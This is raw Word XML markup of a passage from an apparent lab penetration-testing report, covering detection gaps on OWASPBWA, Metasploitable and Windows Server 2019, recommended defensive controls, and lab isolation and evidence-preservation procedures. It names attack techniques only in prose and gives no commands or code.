          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F0997F" w14:textId="5B981BD4" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>6 Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133D9D91" w14:textId="757077D1" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>6.1 OWASPBWA Detection Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5593AC7D" w14:textId="77777777" w:rsidR="00F16CB9" w:rsidRPr="00F16CB9" w:rsidRDefault="00F16CB9" w:rsidP="00F16CB9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:t>The web application server had no intrusion detection capabilities evident. SQL injections did not raise any security alerts, whereas command injection and reverse shell creation did not raise any security warnings. Absence of the deployment of web application firewall (WAF), input validation and security event logging were critical detection deficiencies [28].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD1B53F" w14:textId="77777777" w:rsidR="00F16CB9" w:rsidRDefault="00F16CB9" w:rsidP="00F16CB9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:t xml:space="preserve">Control Recommendations: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:t xml:space="preserve"> WAF implementation, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:t>parameterised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:t xml:space="preserve"> database queries, full application logging (SIEM integration) and real time outbound network connection anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02740AB1" w14:textId="70A217F7" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="00F16CB9">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>6.2 Metasploitable Monitoring Inadequacies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE492BE" w14:textId="77777777" w:rsidR="00F16CB9" w:rsidRPr="00F16CB9" w:rsidRDefault="00F16CB9" w:rsidP="00F16CB9">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation of legacy services was possible without the activation of defensive processes. The lack of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>network based</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> intrusion detection system (NIDS) allowed reconnaissance, exploitation and establishment of persistence to occur without hindrance. There were no endpoint detection and response (EDR) features to detect suspicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> changes or unauthorised SSS key deployment [29].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B88FA02" w14:textId="51DE779C" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00F16CB9" w:rsidP="00F16CB9">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Recommended Controls: segmentation of network and deployment of IDS/IPS, hardening of services with updates of version, monitoring endpoint solutions, and monitoring of file integrity of key directories in a system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EBF306" w14:textId="4E3A81D0" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>6.3 Windows Server 2019 Security Deficiencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB3DB25" w14:textId="77777777" w:rsidR="00F16CB9" w:rsidRPr="00F16CB9" w:rsidRDefault="00F16CB9" w:rsidP="00F16CB9">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Password spraying attacks were able to avoid account lockouts as a result of inadequate security policy settings. LSASS memory read and NTDS.dit dump extraction operations went through without any Windows Defender or event log analysis. Lack of credential guard, application whitelisting, and privileged access control allowed post-exploitation activities without any restrictions [30].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7227D0" w14:textId="30EAE1D9" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00F16CB9" w:rsidP="00F16CB9">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Suggested Controls: Advanced Threat Protection (ATP), credential guard, privileged access workstations (PAW), just-in-time (JIT) administration, LSASS protection and improved audit policy set up with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>centralised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> log analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4283F0" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6E2F6D" w14:textId="5FBA00B5" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>7 Operational Security and Containment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1E52C6" w14:textId="7DBA1367" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>7.1 Laboratory Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485A382B" w14:textId="67200F01" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00F16CB9"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F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The isolation of the network was fully ensured by configuring the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>virtualised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment with disabled adapters to the external network. Pre-engagement VM snapshots provided the ability to quickly restore, and preservation of forensic evidence was done by fully recording and providing packet capture [31].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482992FA" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Verification Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF853FD" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Network adapter verification confirming host-only configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB0294" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>External connectivity testing demonstrating complete isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335EB05F" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Snapshot validation ensuring rollback capability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A106B9" w14:textId="5DC6A528" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>7.2 Evidence Preservation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585EB17C" w14:textId="77777777" w:rsidR="00FB180E" w:rsidRPr="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00FB180E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>The exploitation activities produced full forensic evidence, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CBBAE9" w14:textId="690F143E" w:rsidR="00FB180E" w:rsidRPr="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00FB180E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:t>Packet captures (PCAP) for each step of exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE66D1" w14:textId="48A22C3B" w:rsidR="00FB180E" w:rsidRPr="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00FB180E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:t>Command history logs of whole attack chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43192831" w14:textId="77777777" w:rsidR="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00FB180E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:t>Screen captures to prove successful compromises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2680121E" w14:textId="1D578F17" w:rsidR="00A000BA" w:rsidRPr="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00FB180E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:t>Screenshots of credentials and databases (for report)</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00FB180E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDF87CE" w14:textId="1F71C5ED" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>8 Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB10442" w14:textId="05B2120D" w:rsidR="00A000BA" w:rsidRDefault="00FB180E" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
